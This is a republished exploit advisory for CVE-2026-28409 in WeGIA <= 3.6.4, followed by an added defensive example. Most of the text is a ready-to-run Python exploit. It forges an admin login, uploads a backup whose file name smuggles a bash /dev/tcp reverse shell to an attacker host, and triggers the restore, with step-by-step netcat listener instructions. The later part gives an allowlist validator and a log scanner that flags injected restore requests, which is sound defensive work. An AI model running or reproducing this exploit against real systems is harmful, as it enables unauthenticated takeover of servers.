WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection
Summary: WeGIA <= 3.6.4 contains a remote code execution vulnerability (CVE-2026-28409) reached through OS command injection in the backup restore function. An attacker can combine an authentication bypass with the command injection to execute arbitrary code on the target server and obtain a reverse shell. The flaw is fixed in version 3.6.5.

2026-3-3 20:45:2 Author: cxsecurity.com (view original)

#!/usr/bin/env python3
# Exploit Title: WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection in Backup Restore
# CVE: CVE-2026-28409
# Date: 2026-02-28
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA
# Affected: WeGIA <= 3.6.4
# Tested on:
# Category: Webapps
# Platform: PHP
# Exploit Type: Remote
# CVSS: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
# CWE: CWE-78
# Description: OS Command Injection in backup/restore functionality allowing unauthenticated RCE when combined with authentication bypass
# Fixed in: 3.6.5
# Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
#
# Examples:
#   python3 exploit.py http://192.168.1.100/WeGIA --lhost 192.168.1.50 --lport 4444
#
# Options:
#   --lhost   Attacker IP for reverse shell
#   --lport   Attacker listening port
#
# Notes:
#   - Requires netcat listener: nc -lvnp <port>
#   - Uses authentication bypass + command injection in filename during restore
#   - Payload is reverse shell via bash
#
# How to Use
#
# Step 1: Start listener
#   nc -lvnp 4444
#
# Step 2: Run exploit
#   python3 exploit.py http://target/WeGIA --lhost 10.10.14.5 --lport 4444

import requests
import urllib3
import urllib.parse
import argparse
import sys
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BANNER = r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                            ║
║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌                                  ║
║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌                                ║
║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█·                               ║
║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌                             ║
║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀                                      ║
║                                                                                            ║
║                          b a n y a m e r _ s e c u r i t y                                 ║
║                                                                                            ║
║                      >>> Silent Hunter • Shadow Presence <<<                               ║
║                                                                                            ║
║   Operator : Mohammed Idrees Banyamer Jordan 🇯🇴                                            ║
║   Handle   : @banyamer_security                                                            ║
║                                                                                            ║
║   CVE-2026-28409 • WeGIA Backup Restore Command Injection                                  ║
║                                                                                            ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
"""

print(BANNER)


def parse_args():
    parser = argparse.ArgumentParser(description="WeGIA CVE-2026-28409 RCE Exploit")
    parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100/WeGIA)")
    parser.add_argument("--lhost", required=True, help="Attacker IP for reverse shell")
    parser.add_argument("--lport", required=True, help="Attacker listening port")
    return parser.parse_args()


def build_payload(lhost, lport):
    revshell = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
    filename = f"dump;{revshell};poc.tar.gz"
    return filename


def main():
    args = parse_args()
    base_url = args.target.rstrip('/')
    lhost = args.lhost
    lport = args.lport

    session = requests.Session()
    session.verify = False

    malicious_filename = build_payload(lhost, lport)
    print(f"[*] Generated malicious filename: {malicious_filename}")

    dummy_content = (
        b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03"
        b"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    )

    print("[*] Attempting authentication bypass + admin session")
    login_url = f"{base_url}/html/login.php"
    bypass_data = {
        'c': 'true',
        'cpf': 'admin',
        'id_pessoa': '1'
    }
    try:
        r = session.post(login_url, data=bypass_data, timeout=10)
        if r.status_code != 200:
            print(f"[-] Login bypass failed (status {r.status_code})")
            sys.exit(1)
        print("[+] Auth bypass appears successful")
    except Exception as e:
        print(f"[-] Connection error during login: {e}")
        sys.exit(1)

    print("[*] Uploading dummy backup with malicious filename")
    upload_url = f"{base_url}/html/configuracao/importar_dump.php"
    files = {
        'import': (malicious_filename, dummy_content, 'application/gzip')
    }
    upload_data = {
        'usuario': '1',
        'id_pessoa': '1'
    }
    try:
        r = session.post(upload_url, files=files, data=upload_data, timeout=12)
        if r.status_code not in (200, 201, 302):
            print(f"[-] Upload failed (status {r.status_code})")
            sys.exit(1)
        print("[+] Upload completed")
    except Exception as e:
        print(f"[-] Upload error: {e}")
        sys.exit(1)

    print("[*] Triggering restore → attempting RCE")
    restore_url = f"{base_url}/html/configuracao/gerenciar_backup.php"
    params = {
        'action': 'restore',
        'file': malicious_filename,
        'usuario': '1',
        'id_pessoa': '1'
    }
    try:
        r = session.get(restore_url, params=params, allow_redirects=False, timeout=15)
        print("[*] Restore request sent")
        print("[*] Check your listener for incoming reverse shell")
        print("[*] If no connection after 10-20s → target may be patched / firewall blocked / wrong path")
    except Exception as e:
        print(f"[-] Error during restore trigger: {e}")

    print("\nExploit finished. Waiting for shell...\n")


if __name__ == "__main__":
    main()
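The script above works because the restore handler passes the uploaded archive's name into a shell command without validating it. The following is an added example written for this page, not code from WeGIA or from the advisory author, showing the defender's side of the same issue: a strict allowlist check for a backup archive name (the pattern is an assumption about what a sane backup name looks like, not the vendor's fix in 3.6.5), and a small log scanner that flags restore requests to the gerenciar_backup.php endpoint named in the script whose file parameter fails that check. The log format is assumed to be Apache/nginx combined format, and the log lines are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Allowlist for a backup archive name (assumption for this example): a plain
# base name of letters, digits, '_', '-' and '.', ending in .tar.gz. Anything
# outside this set, in particular shell metacharacters and path separators,
# is rejected before the name could reach a command line (CWE-78 / CWE-22).
SAFE_BACKUP_NAME = re.compile(r'[A-Za-z0-9_][A-Za-z0-9_.-]{0,199}\.tar\.gz')

# Characters that give a shell command-chaining or substitution power; used only
# to label a hit as likely command injection rather than a merely odd name.
SHELL_META = re.compile(r'[;&|`$<>(){}\n\r\\\'"]')

# Apache/nginx combined-log prefix: client, identity, user, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_safe_backup_filename(name: str) -> bool:
    """Return True only if the name matches the allowlist exactly (no path parts)."""
    if not name or '/' in name or '\\' in name or '..' in name:
        return False
    return SAFE_BACKUP_NAME.fullmatch(name) is not None


def find_restore_injection(lines):
    """Scan access-log lines for restore requests whose 'file' parameter is not a safe name.

    Returns a list of (client_ip, timestamp, decoded_file_value, reason) tuples.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format request line; skip
        url = urlparse(m.group('target'))
        if not url.path.endswith('/gerenciar_backup.php'):
            continue
        qs = parse_qs(url.query)  # percent-decodes and splits repeated keys
        if qs.get('action', [''])[0] != 'restore':
            continue
        for value in qs.get('file', []):
            if is_safe_backup_filename(value):
                continue
            reason = 'shell-metachar' if SHELL_META.search(value) else 'not-allowlisted'
            hits.append((m.group('ip'), m.group('ts'), value, reason))
    return hits


# Constructed sample log lines for this example (not real traffic). The second
# line carries a harmless ';id;' separator in the file name to stand in for the
# injected name pattern 'dump;<command>;poc.tar.gz' used by the advisory.
SAMPLE_LOG = [
    '198.51.100.12 - - [03/Mar/2026:20:40:11 +0100] "GET /WeGIA/html/configuracao/'
    'gerenciar_backup.php?action=restore&file=backup_2026-03-01.tar.gz&usuario=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Mar/2026:20:45:02 +0100] "GET /WeGIA/html/configuracao/'
    'gerenciar_backup.php?action=restore&file=dump%3Bid%3Bpoc.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1" 302 0',
    '203.0.113.7 - - [03/Mar/2026:20:45:09 +0100] "GET /WeGIA/html/configuracao/'
    'gerenciar_backup.php?action=restore&file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 500 0',
    '198.51.100.12 - - [03/Mar/2026:20:46:30 +0100] "GET /WeGIA/html/configuracao/'
    'gerenciar_backup.php?action=list HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    for ip, ts, value, reason in find_restore_injection(SAMPLE_LOG):
        print(f"{ts} {ip} restore file={value!r} [{reason}]")
```

The allowlist check is the server-side control: it is what the restore handler should apply to the uploaded name before it is ever interpolated into a command (and, independently, the command should be built with per-argument quoting rather than string concatenation). The scanner reuses the same check so that detection and mitigation agree on what a legitimate backup name is; any request to the restore action whose name would have been rejected is worth an alert, whether or not it contains a shell metacharacter.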



 

Source: https://cxsecurity.com/issue/WLB-2026030009